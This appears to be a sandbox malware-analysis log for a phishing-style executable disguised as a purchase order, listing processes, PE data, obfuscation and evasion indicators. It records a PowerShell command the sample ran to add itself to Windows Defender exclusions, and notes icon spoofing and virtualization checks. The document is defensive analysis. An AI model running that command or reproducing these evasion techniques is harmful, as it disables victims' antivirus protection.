          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase_order_397484658464974945648447564845.exeVirustotal: Detection: 40%
          Source: Purchase_order_397484658464974945648447564845.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeFile read: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: System.Core.ni.pdbRSDSD source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: jVisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Configuration.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: mscorlib.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: System.Drawing.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: .pdbHh source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdb source: WERFC3.tmp.dmp.15.dr

          Data Obfuscation:

          barindex
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: real checksum: 0xa25a1 should be: 0xabc83
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041C942 push es; ret
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00415C5F push esi; ret
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041CD7C push ds; iretd
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041850E push esp; iretd
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00415F8E push es; retf

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (58).png
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
